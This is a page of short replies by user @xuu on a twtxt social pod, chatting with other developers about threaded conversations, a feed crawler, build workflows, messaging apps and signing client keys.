@xuu@txt.sour.is

@mckinley @prologic I have updated the ticket with my findings.. its not what you expect! /clickbait https://github.com/jointwt/twtxt/issues/424

In reply to: #4kjvlfa 5 years ago
@xuu@txt.sour.is

@antonio @mckinley @prologic i did use Wireapp for a little bit. it is pretty polished and doesnt rely on phone numbers for connecting. The ownership had some shady changes but im not sure it ever led to issues in the security model.

In reply to: #7625tqq 5 years ago
@xuu@txt.sour.is

@darch @prologic Technically it should be at the start.. Though the parser doesn't currently care where it is. Though that leads to artifacts like any random string inside perens becoming a subject.

In reply to: #v5yaeha 5 years ago
@xuu@txt.sour.is

@prologic :-D i consider myself subpar on UX outside of React, but can def give it a stab.

In reply to: #kk5o2ja 5 years ago
@xuu@txt.sour.is

@prologic we would want:

  • a way to reply to the current thread. We have this.
  • a way to reply to a specific twt. Need this. Maybe make all the replies start new conversations?
  • check if twt is start of a conversation.. we kinda have this in the main feed with the conversation button. need to extend it for forked convs
  • a way to inline first replies. maybe show one or two in the sub thread with a link to view.
  • for convenience have a link to parent conv?
In reply to: #kk5o2ja 5 years ago
@xuu@txt.sour.is

@prologic speaking of complexity.. How would checking twts for sub conversations complexify things?

In reply to: #kk5o2ja 5 years ago
@xuu@txt.sour.is

Hmm on mobile it shows as the text :poop: and not 💩

Maybe the mobile version has text emoji substitution like slack/discord does?

In reply to: #xer3nwa 5 years ago
@xuu@txt.sour.is

@prologic @thewismit Ya I get that error a lot. I mostly use the web on mobile as a result.

In reply to: #nicbdoq 5 years ago
@xuu@txt.sour.is

@prologic i think i finally suss'd out my hash issue.. now to figure out why im losing avatars on restart.

In reply to: #ffxaisq 5 years ago
@xuu@txt.sour.is

@prologic @thewismit not sure.. im using Caddy instead of nginix

In reply to: #koydrdq 5 years ago
@xuu@txt.sour.is

@prologic yeah it reads a seed file. I'm using mine. it scans for any mention links and then scans them recursively. it reads from http/s or gopher. i don't have much of a db yet.. it just writes to disk the feed and checks modified dates.. but I will add a db that has hashs/mentions/subjects and such.

In reply to: #37xr3ra 5 years ago
@xuu@txt.sour.is

@prologic sure. I don't use signal much because I have to disclose my personal phone. Telegram? https://www.t.me/xypheri

In reply to: #3cs4rua 5 years ago
@xuu@txt.sour.is

@prologic ooh I am adding that to my test suite

In reply to: #hrqg53a 5 years ago
@xuu@txt.sour.is

@deadguy @prologic been stewing on a discovery proto for twtxt. support for defining multiple ways to host/mirror a twtxt file. while being low tech enough to still be scriptable with basic Unix commands.

In reply to: #xnbxtha 5 years ago
@xuu@txt.sour.is

@prologic one.. kinda sorta option would be to tailor a workflow for each of the archs.. see https://github.com/JonLundy/twtxt/runs/1568071072?check_suite_focus=true

In reply to: #woeyf2q 5 years ago
@xuu@txt.sour.is

@xuu @prologic oh.. you are.. maybe i don't understand the issue with building?

In reply to: #woeyf2q 5 years ago
@xuu@txt.sour.is

@prologic

Can we not have clients sign their own public keys before listing them on their Pod’s account?

Yeah.. we probably could. when they setup an account they create a master key that signs any subsequent keys. or chain of signatures like keybase does.

In reply to: #f7rdmuq 5 years ago
@xuu@txt.sour.is

@xuu Not too happy with WKD's use of CNAME over SRV for discovery of openpgpkey.. That breaks using SNI pretty quick. I suppose it was setup as a temporary workaround anyhow in the [RFC..](https://tools.ietf.org/html/draft-koch-openpgp-webkey-service-11#<section-3 https://txt.sour.is/search?tag=section-3>.1)

In reply to: #63dtg5a 5 years ago
Comment via email